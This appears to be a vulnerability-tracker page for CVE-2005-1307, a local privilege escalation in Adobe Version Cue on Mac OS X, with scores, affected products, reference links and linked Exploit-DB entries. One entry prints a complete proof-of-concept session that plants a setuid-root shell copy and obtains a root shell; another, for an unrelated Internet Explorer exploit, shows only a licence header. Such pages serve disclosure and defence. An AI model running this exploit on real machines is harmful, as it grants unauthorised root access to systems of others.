CVE-2005-1307
published 2005-05-17CVE-2005-1307: The (1) stopserver.sh and (2) startserver.sh scripts in Adobe Version Cue on Mac OS X uses the current working directory to find and execute the productname.sh…
PriorityP431high7.2CVSS 2.0
AVLACLAuNCCICAC
EXPLOIT
EPSS
3.65%
88.2th percentile
The (1) stopserver.sh and (2) startserver.sh scripts in Adobe Version Cue on Mac OS X uses the current working directory to find and execute the productname.sh script, which allows local users to execute arbitrary code by copying and calling the scripts from a user-controlled directory.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| adobe | version_cue | — | — |
| apple | mac_os_x | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft Internet Explorer - 'blnmgr.dll' COM Object Remote (MS05-038)
exploitdb·2005-08-09
CVE-2005-1990 Microsoft Internet Explorer - 'blnmgr.dll' COM Object Remote (MS05-038)
Microsoft Internet Explorer - 'blnmgr.dll' COM Object Remote (MS05-038)
---
mypage.html
#
#######################################################
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License version 2, 1991 as published by
# the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# A copy of the GNU General Public License can be found at:
# http://www.gnu.org/licenses/gpl.html
# or you can write to:
# Free Software Foundation, Inc.
# 59 Temple Place - Suite 330
# Boston, MA 02111-1307
# USA.
Exploit-DB
Apple Mac OSX Adobe Version Cue - Local Privilege Escalation
exploitdb·2004-12-08
CVE-2005-1307 Apple Mac OSX Adobe Version Cue - Local Privilege Escalation
Apple Mac OSX Adobe Version Cue - Local Privilege Escalation
---
Proof of concept:
haven:~ fintler$ cd ~
haven:~ fintler$ id
uid=502(fintler) gid=500(fintler) groups=500(fintler)
haven:~ fintler$ echo "cp /bin/sh /Users/$USER;chmod 4755
/Users/$USER/sh;chown root /Users/$USER/sh" > productname.sh
haven:~ fintler$ chmod 0755 ./productname.sh
haven:~ fintler$ ln -s /Applications/Adobe\ Version\ Cue/stopserver.sh .
haven:~ fintler$ ./stopserver.sh
Stopping ...
./stopserver.sh: line 21: ./tomcat/bin/shutdown.sh: No such file or directory
No matching processes belonging to you were found
haven:~ fintler$ ./sh
sh-2.05b# id
uid=502(fintler) euid=0(root) gid=500(fintler) groups=500(fintler)
sh-2.05b# whoami
root
sh-2.05b#
# milw0rm.com [2004-12-08]
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/bugtraq/2004-12/0040.htmlhttp://marc.info/?l=bugtraq&m=111627622403544&w=2http://secunia.com/advisories/13399http://securitytracker.com/id?1012446http://www.adobe.com/support/techdocs/331621.htmlhttp://www.osvdb.org/12297http://www.osvdb.org/12298http://www.securiteam.com/exploits/5EP0D20FQC.htmlhttp://www.securityfocus.com/bid/11833https://exchange.xforce.ibmcloud.com/vulnerabilities/18445http://archives.neohapsis.com/archives/bugtraq/2004-12/0040.htmlhttp://marc.info/?l=bugtraq&m=111627622403544&w=2http://secunia.com/advisories/13399http://securitytracker.com/id?1012446http://www.adobe.com/support/techdocs/331621.htmlhttp://www.osvdb.org/12297http://www.osvdb.org/12298http://www.securiteam.com/exploits/5EP0D20FQC.htmlhttp://www.securityfocus.com/bid/11833https://exchange.xforce.ibmcloud.com/vulnerabilities/18445
2005-05-17
Published